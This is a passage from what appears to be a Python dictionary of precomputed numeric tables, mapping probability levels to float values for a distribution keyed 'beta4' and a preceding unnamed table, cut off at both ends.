0.6520843709606412, 0.324: 0.6531423376907116, 0.325: 0.6531423376907116, 0.326: 0.6541966889300284, 0.327: 0.6541966889300284, 0.328: 0.655247469909402, 0.329: 0.655247469909402, 0.33: 0.6562947251470874, 0.331: 0.6562947251470874, 0.332: 0.6573384984654542, 0.333: 0.6573384984654542, 0.334: 0.6583788330071836, 0.335: 0.6583788330071836, 0.336: 0.6594157712510555, 0.337: 0.6594157712510555, 0.338: 0.6604493550272211, 0.339: 0.6604493550272211, 0.34: 0.6614796255321204, 0.341: 0.6614796255321204, 0.342: 0.6625066233429459, 0.343: 0.6625066233429459, 0.344: 0.663018907502609, 0.345: 0.6635303884317454, 0.346: 0.6640410710345586, 0.347: 0.6645509601791186, 0.348: 0.6650600606977741, 0.349: 0.6655683773875551, 0.35: 0.6660759150105728, 0.351: 0.6665826782944113, 0.352: 0.6670886719325101, 0.353: 0.6675939005845511, 0.354: 0.6680983688768286, 0.355: 0.6686020814026354, 0.356: 0.6691050427226102, 0.357: 0.6696072573651206, 0.358: 0.6701087298265976, 0.359: 0.6706094645719106, 0.36: 0.6711094660346952, 0.361: 0.6716087386177194, 0.362: 0.6721072866932013, 0.363: 0.672605114603156, 0.364: 0.6731022266597249, 0.365: 0.673598627145503, 0.366: 0.6740943203138587, 0.367: 0.6745893103892513, 0.368: 0.6750836015675439, 0.369: 0.675577198016321, 0.37: 0.6760701038751914, 0.371: 0.6765623232560871, 0.372: 0.6770538602435703, 0.373: 0.6775447188951182, 0.374: 0.6780349032414232, 0.375: 0.6785244172866713, 0.376: 0.6790132650088415, 0.377: 0.6795014503599768, 0.378: 0.6799889772664565, 0.379: 0.6804758496292819, 0.38: 0.6809620713243425, 0.381: 0.6814476462026801, 0.382: 0.681932578090763, 0.383: 0.6824168707907288, 0.384: 0.6829005280806688, 0.385: 0.6833835537148568, 0.386: 0.6838659514240226, 0.387: 0.6843477249155834, 0.388: 0.6848288778739036, 0.389: 0.6853094139605289, 0.39: 0.6857893368144322, 0.391: 0.6862686500522506, 0.392: 0.686747357268519, 0.393: 0.6872254620359026, 0.394: 0.687702967905425, 0.395: 0.688179878406694, 0.396: 0.688656197048134, 0.397: 0.6891319273171946, 0.398: 0.6896070726805891, 0.399: 0.6900816365844882, 0.4: 0.6905556224547547, 0.401: 0.6910290336971351, 0.402: 0.6915018736974954, 0.403: 0.6919741458219966, 0.404: 0.6924458534173312, 0.405: 0.692916999810907, 0.406: 0.6933875883110421, 0.407: 0.693857622207189, 0.408: 0.6943271047701068, 0.409: 0.6947960392520569, 0.41: 0.6952644288870155, 0.411: 0.6957322768908354, 0.412: 0.6961995864614565, 0.413: 0.6966663607790745, 0.414: 0.6971326030063474, 0.415: 0.6975983162885411, 0.416: 0.6980635037537497, 0.417: 0.6985281685130438, 0.418: 0.6989923136606674, 0.419: 0.6994559422741938, 0.42: 0.699919057414716, 0.421: 0.7003816621269993, 0.422: 0.700843759439666, 0.423: 0.7013053523653541, 0.424: 0.7017664439008835, 0.425: 0.702227037027428, 0.426: 0.7026871347106631, 0.427: 0.7031467399009421, 0.428: 0.7036058555334419, 0.429: 0.7040644845283315, 0.43: 0.7045226297909155, 0.431: 0.70498029421181, 0.432: 0.7054374806670598, 0.433: 0.7058941920183321, 0.434: 0.7063504311130315, 0.435: 0.7068062007844735, 0.436: 0.7072615038520105, 0.437: 0.7077163431211877, 0.438: 0.7081707213838986, 0.439: 0.7086246414185028, 0.44: 0.7090781059899909, 0.441: 0.7099836797374939, 0.442: 0.7099836797374939, 0.443: 0.7108874644840137, 0.444: 0.7108874644840137, 0.445: 0.7117894818819261, 0.446: 0.7117894818819261, 0.447: 0.7126897533826833, 0.448: 0.7126897533826833, 0.449: 0.713588300241041, 0.45: 0.713588300241041, 0.451: 0.7144851435191959, 0.452: 0.7144851435191959, 0.453: 0.7153803040908813, 0.454: 0.7153803040908813, 0.455: 0.7162738026453555, 0.456: 0.7162738026453555, 0.457: 0.7171656596913379, 0.458: 0.7171656596913379, 0.459: 0.7180558955609, 0.46: 0.7180558955609, 0.461: 0.7189445304132334, 0.462: 0.7189445304132334, 0.463: 0.7198315842384235, 0.464: 0.7198315842384235, 0.465: 0.7207170768611065, 0.466: 0.7207170768611065, 0.467: 0.7216010279440989, 0.468: 0.7216010279440989, 0.469: 0.7220424315094723, 0.47: 0.7224834569919608, 0.471: 0.7229241068054837, 0.472: 0.7233643833544984, 0.473: 0.7238042890341194, 0.474: 0.7242438262302121, 0.475: 0.7246829973195117, 0.476: 0.7251218046697115, 0.477: 0.7255602506395729, 0.478: 0.7259983375790399, 0.479: 0.7264360678293225, 0.48: 0.7268734437230076, 0.481: 0.727310467584157, 0.482: 0.7277471417284112, 0.483: 0.7281834684630808, 0.484: 0.7286194500872518, 0.485: 0.7290550888918857, 0.486: 0.7294903871599046, 0.487: 0.729925347166297, 0.488: 0.7303599711782167, 0.489: 0.7307942614550686, 0.49: 0.7312282202486056, 0.491: 0.731661849803029, 0.492: 0.7320951523550754, 0.493: 0.7325281301341102, 0.494: 0.7329607853622234, 0.495: 0.7333931202543144, 0.496: 0.7338251370181907, 0.497: 0.7342568378546537, 0.498: 0.7346882249575918, 0.499: 0.7351193005140648, 0.5: 0.7355500667043946, 0.501: 0.7359805257022629, 0.502: 0.736410679674782, 0.503: 0.7368405307825945, 0.504: 0.7372700811799572, 0.505: 0.7376993330148248, 0.506: 0.7381282884289455, 0.507: 0.7385569495579267, 0.508: 0.7389853185313442, 0.509: 0.7394133974728119, 0.51: 0.7398411885000629, 0.511: 0.7402686937250471, 0.512: 0.7406959152540055, 0.513: 0.741122855187553, 0.514: 0.7415495156207655, 0.515: 0.7419758986432556, 0.516: 0.7424020063392585, 0.517: 0.7428278407877171, 0.518: 0.7432534040623593, 0.519: 0.7436786982317708, 0.52: 0.7441037253594894, 0.521: 0.7445284875040802, 0.522: 0.7449529867192101, 0.523: 0.7453772250537332, 0.524: 0.745801204551769, 0.525: 0.7462249272527776, 0.526: 0.7466483951916411, 0.527: 0.7470716103987431, 0.528: 0.7474945749000428, 0.529: 0.74791729071716, 0.53: 0.748339759867439, 0.531: 0.7487619843640451, 0.532: 0.7491839662160209, 0.533: 0.7500272100021748, 0.534: 0.7504484759345688, 0.535: 0.750869507218928, 0.536: 0.7512903058448795, 0.537: 0.7517108737983949, 0.538: 0.7521312130618715, 0.539: 0.7525513256141956, 0.54: 0.7529712134308282, 0.541: 0.7533908784838732, 0.542: 0.7538103227421544, 0.543: 0.754229548171289, 0.544: 0.7546485567337676, 0.545: 0.7550673503890208, 0.546: 0.7554859310934963, 0.547: 0.7559043008007363, 0.548: 0.7563224614614448, 0.549: 0.7567404150235721, 0.55: 0.7571581634323776, 0.551: 0.7575757086305109, 0.552: 0.7579930525580765, 0.553: 0.7584101971527252, 0.554: 0.7588271443497, 0.555: 0.7592438960819415, 0.556: 0.7596604542801327, 0.557: 0.7600768208727952, 0.558: 0.7604929977863476, 0.559: 0.7609089869451785, 0.56: 0.7613247902717337, 0.561: 0.7617404096865756, 0.562: 0.7621558471084606, 0.563: 0.7621558471084606, 0.564: 0.7625711044544199, 0.565: 0.7629861836398162, 0.566: 0.7634010865784351, 0.567: 0.7638158151825467, 0.568: 0.7642303713629843, 0.569: 0.7646447570292122, 0.57: 0.7650589740894096, 0.571: 0.7654730244505318, 0.572: 0.7658869100183937, 0.573: 0.7663006326977352, 0.574: 0.7667141943923046, 0.575: 0.7671275970049194, 0.576: 0.767540842437554, 0.577: 0.7679539325914064, 0.578: 0.7683668693669741, 0.579: 0.7687796546641252, 0.58: 0.7691922903821782, 0.581: 0.7696047784199711, 0.582: 0.7700171206759436, 0.583: 0.7704293190482026, 0.584: 0.7708413754346044, 0.585: 0.7712532917328274, 0.586: 0.7716650698404466, 0.587: 0.7720767116550123, 0.588: 0.7724882190741225, 0.589: 0.7728995939955002, 0.59: 0.773310838317069, 0.591: 0.773721953937033, 0.592: 0.7741329427539492, 0.593: 0.7745438066668062, 0.594: 0.7749545475750999, 0.595: 0.775365167378917, 0.596: 0.7757756679790029, 0.597: 0.7761860512768476, 0.598: 0.7765963191747626, 0.599: 0.7770064735759555, 0.6: 0.7774165163846163, 0.601: 0.7778264495059879, 0.602: 0.7782362748464531, 0.603: 0.7786459943136105, 0.604: 0.7790556098163555, 0.605: 0.7794651232649613, 0.606: 0.7798745365711616, 0.607: 0.7802838516482298, 0.608: 0.7806930704110627, 0.609: 0.7811021947762602, 0.61: 0.7815112266622087, 0.611: 0.7819201679891684, 0.612: 0.7823290206793507, 0.613: 0.7827377866570054, 0.614: 0.7831464678485047, 0.615: 0.7835550661824275, 0.616: 0.7839635835896478, 0.617: 0.7843720220034165, 0.618: 0.7847803833594487, 0.619: 0.7851886695960131, 0.62: 0.7855968826540182, 0.621: 0.786005024477099, 0.622: 0.786413097011708, 0.623: 0.7868211022072011, 0.624: 0.7872290420159306, 0.625: 0.7876369183933362, 0.626: 0.7880447332980294, 0.627: 0.7884524886918934, 0.628: 0.7888601865401708, 0.629: 0.7892678288115562, 0.63: 0.7896754174782934, 0.631: 0.7900829545162642, 0.632: 0.7904904419050889, 0.633: 0.7908978816282177, 0.634: 0.791305275673029, 0.635: 0.7917126260309262, 0.636: 0.7921199346974361, 0.637: 0.7925272036723071, 0.638: 0.7929344349596062, 0.639: 0.7933416305678247, 0.64: 0.7937487925099744, 0.641: 0.7941559228036911, 0.642: 0.7945630234713377, 0.643: 0.794970096540108, 0.644: 0.7953771440421287, 0.645: 0.79578416801457, 0.646: 0.796191170499746, 0.647: 0.7965981535452262, 0.648: 0.7970051192039411, 0.649: 0.7974120695342927, 0.65: 0.7978190066002653, 0.651: 0.7982259324715344, 0.652: 0.7986328492235822, 0.653: 0.7990397589378074, 0.654: 0.7994466637016426, 0.655: 0.7998535656086684, 0.656: 0.8002604667587291, 0.657: 0.8006673692580524, 0.658: 0.8014811867620207, 0.659: 0.8018881060121092, 0.66: 0.8022950351025896, 0.661: 0.8027019761734091, 0.662: 0.8031089313716283, 0.663: 0.803515902851549, 0.664: 0.803922892774841, 0.665: 0.8043299033106696, 0.666: 0.8047369366358303, 0.667: 0.805143994934877, 0.668: 0.805551080400256, 0.669: 0.80595819523244, 0.67: 0.8063653416400667, 0.671: 0.8067725218400744, 0.672: 0.8071797380578409, 0.673: 0.807586992527326, 0.674: 0.8079942874912138, 0.675: 0.8084016252010561, 0.676: 0.8088090079174157, 0.677: 0.8092164379100194, 0.678: 0.8096239174579022, 0.679: 0.8100314488495599, 0.68: 0.8104390343831015, 0.681: 0.8108466763664051, 0.682: 0.8112543771172726, 0.683: 0.8116621389635872, 0.684: 0.8120699642434749, 0.685: 0.8124778553054687, 0.686: 0.812885814508668, 0.687: 0.8132938442229097, 0.688: 0.8132938442229097, 0.689: 0.8137019468289306, 0.69: 0.8141101247185454, 0.691: 0.8145183802948126, 0.692: 0.8149267159722117, 0.693: 0.8153351341768218, 0.694: 0.8157436373464985, 0.695: 0.8161522279310555, 0.696: 0.8165609083924505, 0.697: 0.8169696812049714, 0.698: 0.8173785488554234, 0.699: 0.817787513843319, 0.7: 0.8181965786810788, 0.701: 0.81860574589422, 0.702: 0.8190150180215611, 0.703: 0.8194243976154219, 0.704: 0.8198338872418283, 0.705: 0.8202434894807192, 0.706: 0.8206532069261581, 0.707: 0.8210630421865471, 0.708: 0.8214729978848386, 0.709: 0.8218830766587641, 0.71: 0.8222932811610467, 0.711: 0.8227036140596329, 0.712: 0.8231140780379193, 0.713: 0.8235246757949855, 0.714: 0.8239354100458285, 0.715: 0.8243462835216071, 0.716: 0.8247572989698749, 0.717: 0.8251684591548364, 0.718: 0.8255797668575894, 0.719: 0.8259912248763827, 0.72: 0.8264028360268721, 0.721: 0.82681460314238, 0.722: 0.8272265290741677, 0.723: 0.8276386166916927, 0.724: 0.8280508688828925, 0.725: 0.8284632885544565, 0.726: 0.8288758786321117, 0.727: 0.829288642060904, 0.728: 0.829701581805491, 0.729: 0.8301147008504408, 0.73: 0.8305280022005292, 0.731: 0.8309414888810429, 0.732: 0.8313551639380885, 0.733: 0.8317690304389093, 0.734: 0.832183091472205, 0.735: 0.8325973501484578, 0.736: 0.8330118096002533, 0.737: 0.8334264729826311, 0.738: 0.8338413434734111, 0.739: 0.8342564242735487, 0.74: 0.8346717186074828, 0.741: 0.8350872297234988, 0.742: 0.835502960894084, 0.743: 0.8359189154163078, 0.744: 0.836335096612192, 0.745: 0.8367515078290969, 0.746: 0.8371681524401079, 0.747: 0.8375850338444296, 0.748: 0.8380021554677974, 0.749: 0.8384195207628786, 0.75: 0.8388371332096949, 0.751: 0.839254996316041, 0.752: 0.8396731136179256, 0.753: 0.84009148868, 0.754: 0.8405101250960147, 0.755: 0.8409290264892669, 0.756: 0.8413481965130679, 0.757: 0.8417676388512205, 0.758: 0.8421873572184837, 0.759: 0.8426073553610762, 0.76: 0.8430276370571695, 0.761: 0.8434482061173915, 0.762: 0.8438690663853534, 0.763: 0.8442902217381587, 0.764: 0.844711676086954, 0.765: 0.8451334333774695, 0.766: 0.8455554975905712, 0.767: 0.8464005628871285, 0.768: 0.8468235721131693, 0.769: 0.8472469045481636, 0.77: 0.8476705643574003, 0.771: 0.8480945557448651, 0.772: 0.8485188829538903, 0.773: 0.8489435502677997, 0.774: 0.8493685620105581, 0.775: 0.8497939225474583, 0.776: 0.8502196362858021, 0.777: 0.8506457076755949, 0.778: 0.851072141210278, 0.779: 0.8514989414274313, 0.78: 0.8519261129095379, 0.781: 0.8523536602847411, 0.782: 0.852781588227601, 0.783: 0.853209901459908, 0.784: 0.8536386047514757, 0.785: 0.854067702920964, 0.786: 0.8544972008367249, 0.787: 0.8549271034176584, 0.788: 0.8553574156340878, 0.789: 0.8557881425086524, 0.79: 0.8562192891172231, 0.791: 0.8566508605898439, 0.792: 0.8570828621116668, 0.793: 0.857515298923939, 0.794: 0.8579481763250044, 0.795: 0.8583814996712956, 0.796: 0.858815274378404, 0.797: 0.8592495059221108, 0.798: 0.8596841998395001, 0.799: 0.8601193617300558, 0.8: 0.8605549972567834, 0.801: 0.860991112147404, 0.802: 0.8614277121955056, 0.803: 0.8618648032617768, 0.804: 0.862302391275245, 0.805: 0.8627404822345398, 0.806: 0.8631790822091976, 0.807: 0.8636181973409898, 0.808: 0.8640578338452893, 0.809: 0.8644979980124431, 0.81: 0.8649386962092287, 0.811: 0.8653799348802875, 0.812: 0.8658217205496228, 0.813: 0.8658217205496228, 0.814: 0.8662640598221462, 0.815: 0.8667069593852249, 0.816: 0.8671504260102983, 0.817: 0.8675944665545221, 0.818: 0.8680390879624442, 0.819: 0.868484297267744, 0.82: 0.8689301015949923, 0.821: 0.8693765081614677, 0.822: 0.8698235242790151, 0.823: 0.8702711573559507, 0.824: 0.8707194148990185, 0.825: 0.8711683045153991, 0.826: 0.8716178339147624, 0.827: 0.8720680109113631, 0.828: 0.8725188434262364, 0.829: 0.8729703394893837, 0.83: 0.8734225072420762, 0.831: 0.8738753549391953, 0.832: 0.8743288909516078, 0.833: 0.8747831237686716, 0.834: 0.8752380620007343, 0.835: 0.8756937143817536, 0.836: 0.8761500897719717, 0.837: 0.8766071971606508, 0.838: 0.8770650456689086, 0.839: 0.8775236445525976, 0.84: 0.8779830032053098, 0.841: 0.8784431311614472, 0.842: 0.87890403809934, 0.843: 0.8793657338445258, 0.844: 0.8798282283730703, 0.845: 0.8802915318150021, 0.846: 0.8807556544578454, 0.847: 0.8812206067502519, 0.848: 0.8816863993057594, 0.849: 0.8821530429066325, 0.85: 0.8826205485078215, 0.851: 0.8830889272410779, 0.852: 0.8835581904191525, 0.853: 0.8840283495401449, 0.854: 0.8844994162919538, 0.855: 0.8849714025569239, 0.856: 0.8854443204165868, 0.857: 0.885918182156552, 0.858: 0.8863930002715902, 0.859: 0.8868687874708521, 0.86: 0.8873455566832378, 0.861: 0.8878233210629703, 0.862: 0.8883020939953478, 0.863: 0.8887818891026656, 0.864: 0.8892627202503346, 0.865: 0.889744601553215, 0.866: 0.8902275473821786, 0.867: 0.8907115723708232, 0.868: 0.89119669142251, 0.869: 0.8916829197175793, 0.87: 0.8921702727208111, 0.871: 0.8926587661891863, 0.872: 0.8931484161798863, 0.873: 0.8936392390585964, 0.874: 0.894131251508071, 0.875: 0.8946244705370525, 0.876: 0.8951189134894744, 0.877: 0.895614598054019, 0.878: 0.8961115422740262, 0.879: 0.8966097645577332, 0.88: 0.8971092836889663, 0.881: 0.8976101188381802, 0.882: 0.8981122895739193, 0.883: 0.8986158158747501, 0.884: 0.8996270172107048, 0.885: 0.9001347343668029, 0.886: 0.9006438913571762, 0.887: 0.9011545104060396, 0.888: 0.9016666142295524, 0.889: 0.9021802260514752, 0.89: 0.9026953696194422, 0.891: 0.9032120692219234, 0.892: 0.9037303497058868, 0.893: 0.9042502364952025, 0.894: 0.9047717556098503, 0.895: 0.9052949336859292, 0.896: 0.9058197979965497, 0.897: 0.9063463764736668, 0.898: 0.9068746977307942, 0.899: 0.907404791086872, 0.9: 0.9079366865910729, 0.901: 0.9084704150488361, 0.902: 0.9090060080490603, 0.903: 0.9095434979925788, 0.904: 0.910082918121967, 0.905: 0.910624302552747, 0.906: 0.9111676863061664, 0.907: 0.9117131053434584, 0.908: 0.9122605966018961, 0.909: 0.9128101980325561, 0.91: 0.9133619486400298, 0.911: 0.9139158885240886, 0.912: 0.9144720589236099, 0.913: 0.915030502262612, 0.914: 0.9155912621989051, 0.915: 0.9161543836751155, 0.916: 0.916719912972671, 0.917: 0.9172878977685587, 0.918: 0.9178583871953134, 0.919: 0.9184314319042856, 0.92: 0.91900708413253, 0.921: 0.9195853977735284, 0.922: 0.9201664284519813, 0.923: 0.920750233602964, 0.924: 0.921336872555888, 0.925: 0.9219264066234327, 0.926: 0.9225188991959647, 0.927: 0.9231144158417716, 0.928: 0.9237130244135927, 0.929: 0.9243147951619725, 0.93: 0.9249198008559241, 0.931: 0.9255281169114625, 0.932: 0.9261398215287105, 0.933: 0.9267549958382909, 0.934: 0.9273737240577397, 0.935: 0.92799609365872, 0.936: 0.928622195546219, 0.937: 0.9292521242504579, 0.938: 0.9292521242504579, 0.939: 0.9298859781328668, 0.94: 0.9305238596073836, 0.941: 0.931165875378347, 0.942: 0.9318121366967276, 0.943: 0.9324627596362657, 0.944: 0.9331178653916035, 0.945: 0.933777580600472, 0.946: 0.9344420376924215, 0.947: 0.9351113752667268, 0.948: 0.9357857385026679, 0.949: 0.9364652796054211, 0.95: 0.937150158291647, 0.951: 0.9378405423189374, 0.952: 0.9385366080642967, 0.953: 0.9392385411571911, 0.954: 0.9399465371734812, 0.955: 0.9406608023978891, 0.956: 0.9413815546631431, 0.957: 0.9421090242753994, 0.958: 0.9428434550374909, 0.959: 0.9435851053822989, 0.96: 0.9443342496316968, 0.961: 0.9450911793978888, 0.962: 0.945856205148016, 0.963: 0.9466296579552712, 0.964: 0.9474118914646792, 0.965: 0.9482032841068802, 0.966: 0.9490042415986161, 0.967: 0.9498151997772327, 0.968: 0.9506366278252294, 0.969: 0.9514690319520888, 0.97: 0.9523129596160298, 0.971: 0.9531690043849087, 0.972: 0.9540378115592142, 0.973: 0.9549200847079529, 0.974: 0.9558165933058685, 0.975: 0.9567281817072483, 0.976: 0.9576557797538003, 0.977: 0.9586004153958916, 0.978: 0.9595632298144803, 0.979: 0.9605454956773251, 0.98: 0.961548639362179, 0.981: 0.9625742682534052, 0.982: 0.9636242046045878, 0.983: 0.9647005280060533, 0.984: 0.9658056292907885, 0.985: 0.9669422798859362, 0.986: 0.9681137223883007, 0.987: 0.969323790886672, 0.988: 0.9705770739195563, 0.989: 0.9718791401261718, 0.99: 0.9732368588572403, 0.991: 0.9746588696894386, 0.992: 0.9761562952386755, 0.993: 0.9777438717615068, 0.994: 0.9794418425593265, 0.995: 0.9812793568951739, 0.996: 0.9833011613491072, 0.997: 0.9855825957791874, 0.998: 0.9882705907872608, 0.999: 0.9917445572122447}, 'beta4': {0.001: 0.00019998005804071128, 0.002: 0.0004002204045574647, 0.003: 0.0006006213287669104, 0.004: 0.0008011831206943514, 0.005: 0.0010019060711810082, 0.006: 0.0012027904718907045, 0.007: 0.0014038366153058955, 0.008: 0.001605044794729051, 0.009: 0.0018064153042957605, 0.01: 0.002007948438980501, 0.011: 0.0022096444945776577, 0.012: 0.002411503767724943, 0.013: 0.0026135265559143867, 0.014: 0.0028157131574584517, 0.015: 0.003018063871538153, 0.016: 0.003220578998168856, 0.017: 0.0034232588382341047, 0.018: 0.0036261036934598237, 0.019: 0.0038291138664526846, 0.02: 0.00403228966066378, 0.021: 0.0042356313804248705, 0.022: 0.004439139330928271, 0.023: 0.004642813818244524, 0.024: 0.004846655149330454, 0.025: 0.0050506636320080825, 0.026: 0.005254839574995085, 0.027: 0.005459183287890954, 0.028: 0.005663695081191499, 0.029: 0.005868375266289406, 0.03: 0.006073224155463766, 0.031: 0.006278242061907052, 0.032: 0.0064834292997097125, 0.033: 0.00668878618387534, 0.034: 0.006894313030321713, 0.035: 0.007100010155878011, 0.036: 0.007305877878297563, 0.037: 0.007511916516250114, 0.038: 0.007718126389340973, 0.039: 0.007924507818096463, 0.04: 0.008131061123992048, 0.041: 0.008337786629420182, 0.042: 0.008544684657735183, 0.043: 0.008751755533227578, 0.044: 0.008958999581128573, 0.045: 0.009166417127646475, 0.046: 0.009374008499919767, 0.047: 0.009581774026066928, 0.048: 0.009789714035155795, 0.049: 0.009997828857236844, 0.05: 0.010206118823319751, 0.051: 0.010414584265399651, 0.052: 0.010623225516449099, 0.053: 0.010832042910421927, 0.054: 0.01104103678226016, 0.055: 0.011250207467897311, 0.056: 0.01145955530427429, 0.057: 0.011669080629309344, 0.058: 0.011878783781943972, 0.059: 0.012088665102121407, 0.06: 0.012298724930791, 0.061: 0.012508963609927542, 0.062: 0.012719381482517458, 0.063: 0.012929978892580032, 0.064: 0.013140756185157917, 0.065: 0.01335171370632152, 0.066: 0.013562851803192999, 0.067: 0.013774170823917384, 0.068: 0.013985671117698075, 0.069: 0.014197353034783821, 0.07: 0.014409216926473003, 0.071: 0.014621263145133328, 0.072: 0.01483349204417878, 0.073: 0.015045903978106762, 0.074: 0.015258499302476039, 0.075: 0.015471278373926986, 0.076: 0.01568424155017064, 0.077: 0.015897389190005436, 0.078: 0.01611072165333038, 0.079: 0.016324239301124484, 0.08: 0.01653794249546798, 0.081: 0.016751831599545276, 0.082: 0.016965906977645433, 0.083: 0.017180168995179712, 0.084: 0.017394618018656167, 0.085: 0.01760925441572233, 0.086: 0.017824078555136243, 0.087: 0.018039090806796672, 0.088: 0.018254291541735704, 0.089: 0.018469681132123033, 0.09: 0.018685259951271547, 0.091: 0.018901028373641923, 0.092: 0.019116986774852813, 0.093: 0.0193331355316856, 0.094: 0.019549475022072865, 0.095: 0.019766005625124154, 0.096: 0.01998272772112894, 0.097: 0.020199641691539552, 0.098: 0.020416747919000798, 0.099: 0.020634046787345282, 0.1: 0.020851538681598076, 0.101: 0.02106922398798212, 0.102: 0.021287103093923336, 0.103: 0.021505176388065678, 0.104: 0.021723444260250448, 0.105: 0.021941907101542327, 0.106: 0.02216056530424554, 0.107: 0.022379419261869652, 0.108: 0.022598469369177705, 0.109: 0.02281771602215995, 0.11: 0.023037159618063352, 0.111: 0.02325680055536784, 0.112: 0.023476639233836444, 0.113: 0.023696676054460984, 0.114: 0.023916911419520945, 0.115: 0.024137345732567095, 0.116: 0.024357979398413047, 0.117: 0.024578812823170336, 0.118: 0.024799846414236285, 0.119: 0.0250210805802904, 0.12: 0.025242515731326447, 0.121: 0.0254641522786387, 0.122: 0.02568599063482206, 0.123: 0.025908031213808094, 0.124: 0.026130274430829985, 0.125: 0.02635272070246037, 0.126: 0.02657537044660458, 0.127: 0.026798224082502403, 0.128: 0.027021282030743367, 0.129: 0.027244544713269807, 0.13: 0.02746801255337056, 0.131: 0.027691685975712928, 0.132: 0.027915565406323926, 0.133: 0.028139651272603407, 0.134: 0.028363944003336493, 0.135: 0.028588444028694697, 0.136: 0.028813151780242848, 0.137: 0.029038067690943345, 0.138: 0.029263192195163414, 0.139: 0.02948852572869147, 0.14: 0.029714068728718238, 0.141: 0.02993982163386695, 0.142: 0.030165784884191738, 0.143: 0.03039195892118548, 0.144: 0.03061834418777528, 0.145: 0.03084494112834553, 0.146: 0.031071750188734898, 0.147: 0.03129877181624225, 0.148: 0.031526006459636755, 0.149: 0.03175345456917217, 0.15: 0.0319811165965629, 0.151: 0.032208992995031674, 0.152: 0.03243708421929227, 0.153: 0.03266539072555246, 0.154: 0.0328939129715389, 0.155: 0.03312265141649033, 0.156: 0.033351606521157984, 0.157: 0.03358077874784467, 0.158: 0.033810168560369044, 0.159: 0.0340397764240995, 0.16: 0.034269602805954924, 0.161: 0.03449964817442163, 0.162: 0.03472991299952519, 0.163: 0.034960397752885806, 0.164: 0.035191102907694734, 0.165: 0.0354220289387298, 0.166: 0.035653176322351626, 0.167: 0.03588454553653539, 0.168: 0.036116137060853704, 0.169: 0.036347951376499765, 0.17: 0.036579988966282576, 0.171: 0.03681225031465444, 0.172: 0.037044735907685276, 0.173: 0.03727744623310381, 0.174: 0.03751038178028295, 0.175: 0.03774354304026518, 0.176: 0.0379769305057472, 0.177: 0.038210544671111485, 0.178: 0.03844438603241455, 0.179: 0.038678455087416734, 0.18: 0.03891275233556041, 0.181: 0.03914727827800287, 0.182: 0.03938203341761945, 0.183: 0.03961701825899733, 0.184: 0.039852233308465296, 0.185: 0.04008767907407873, 0.186: 0.040323356065650816, 0.187: 0.04055926479473852, 0.188: 0.040795405774665665, 0.189: 0.041031779520537034, 0.19: 0.04126838654921838, 0.191: 0.041505227379378486, 0.192: 0.041742302531467566, 0.193: 0.04197961252775981, 0.194: 0.04221715789232681, 0.195: 0.042454939151061806, 0.196: 0.04269295683169627, 0.197: 0.042931211463792876, 0.198: 0.043169703578770334, 0.199: 0.04340843370990257, 0.2: 0.04364740239231127, 0.201: 0.04388661016301945, 0.202: 0.044126057560915144, 0.203: 0.044365745126777316, 0.204: 0.04460567340329231, 0.205: 0.04484584293505811, 0.206: 0.04508625426858496, 0.207: 0.04532690795231201, 0.208: 0.04556780453662512, 0.209: 0.0458089445738521, 0.21: 0.04605032861826507, 0.211: 0.04629195722611862, 0.212: 0.04653383095563195, 0.213: 0.046775950367015554, 0.214: 0.04701831602246576, 0.215: 0.047260928486195036, 0.216: 0.047503788324414306, 0.217: 0.047746896105369814, 0.218: 0.04799025239934135, 0.219: 0.04823385777863669, 0.22: 0.04847771281762821, 0.221: 0.04872181809275573, 0.222: 0.0489661741825225, 0.223: 0.049210781667516384, 0.224: 0.049455641130425124, 0.225: 0.049700753156030404, 0.226: 0.04994611833123204, 0.227: 0.05019173724506154, 0.228: 0.05043761048866911, 0.229: 0.05068373865537025, 0.23: 0.0509301223406147, 0.231: 0.051176762142036605, 0.232: 0.051423658659436294, 0.233: 0.05167081249480347, 0.234: 0.05191822425233639, 0.235: 0.05216589453842663, 0.236: 0.05241382396170518, 0.237: 0.05266201313301463, 0.238: 0.052910462665459124, 0.239: 0.05315917317438074, 0.24: 0.05340814527739983, 0.241: 0.05365737959440284, 0.242: 0.0539068767475747, 0.243: 0.05415663736139265, 0.244: 0.05440666206264523, 0.245: 0.054656951480446636, 0.246: 0.05490750624623935, 0.247: 0.05515832699382815, 0.248: 0.05540941435935247, 0.249: 0.05566076898134175, 0.25: 0.055912391500690835, 0.251: 0.056164282560705575, 0.252: 0.056416442807086076, 0.253: 0.05666887288794967, 0.254: 0.056921573453853076, 0.255: 0.05717454515779148, 0.256: 0.05742778865521043, 0.257: 0.05768130460403543, 0.258: 0.05793509366466473, 0.259: 0.05818915649999461, 0.26: 0.05844349377541235, 0.261: 0.05869810615884815, 0.262: 0.058952994320748325, 0.263: 0.05920815893411248, 0.264: 0.05946360067448175, 0.265: 0.05971932021999787, 0.266: 0.059975318251359794, 0.267: 0.060231595451876695, 0.268: 0.06048815250747665, 0.269: 0.060744990106690246, 0.27: 0.061002108940712695, 0.271: 0.061259509703376555, 0.272: 0.061517193091183864, 0.273: 0.06177515980332206, 0.274: 0.0620334105416575, 0.275: 0.06229194601078976, 0.276: 0.06255076691801634, 0.277: 0.06280987397338685, 0.278: 0.0630692678896992, 0.279: 0.06332894938251532, 0.28: 0.0635889191701748, 0.281: 0.06384917797382073, 0.282: 0.06410972651739967, 0.283: 0.06437056552768416, 0.284: 0.06463169573428154, 0.285: 0.06489311786967034, 0.286: 0.06515483266918098, 0.287: 0.06541684087103565, 0.288: 0.06567914321635825, 0.289: 0.06594174044918945, 0.29: 0.06620463331649956, 0.291: 0.0664678225682073, 0.292: 0.06673130895719456, 0.293: 0.06699509323932473, 0.294: 0.06725917617345606, 0.295: 0.06752355852145142, 0.296: 0.06778824104820663, 0.297: 0.06805322452166121, 0.298: 0.06831850971281445, 0.299: 0.06858409739574531, 0.3: 0.0688499883476261, 0.301: 0.06911618334873397, 0.302: 0.06938268318247667, 0.303: 0.06964948863540682, 0.304: 0.06991660049723834, 0.305: 0.07018401956087042, 0.306: 0.07045174662238612, 0.307: 0.0707197824810849, 0.308: 0.07098812793950916, 0.309: 0.07125678380343634, 0.31: 0.07152575088192321, 0.311: 0.0717950299872978, 0.312: 0.07206462193520236, 0.313: 0.07233452754459807, 0.314: 0.07260474763778418, 0.315: 0.07287528304041406, 0.316: 0.07314613458153059, 0.317: 0.07341730309355458, 0.318: 0.07368878941234251, 0.319: 0.0739605943771658, 0.32: 0.07423271883076066, 0.321: 0.07450516361932857, 0.322: 0.07477792959256262, 0.323: 0.07505101760367115, 0.324: 0.07532442850939472, 0.325: 0.07559816317001775, 0.326: 0.07587222244939851, 0.327: 0.07614660721498685, 0.328: 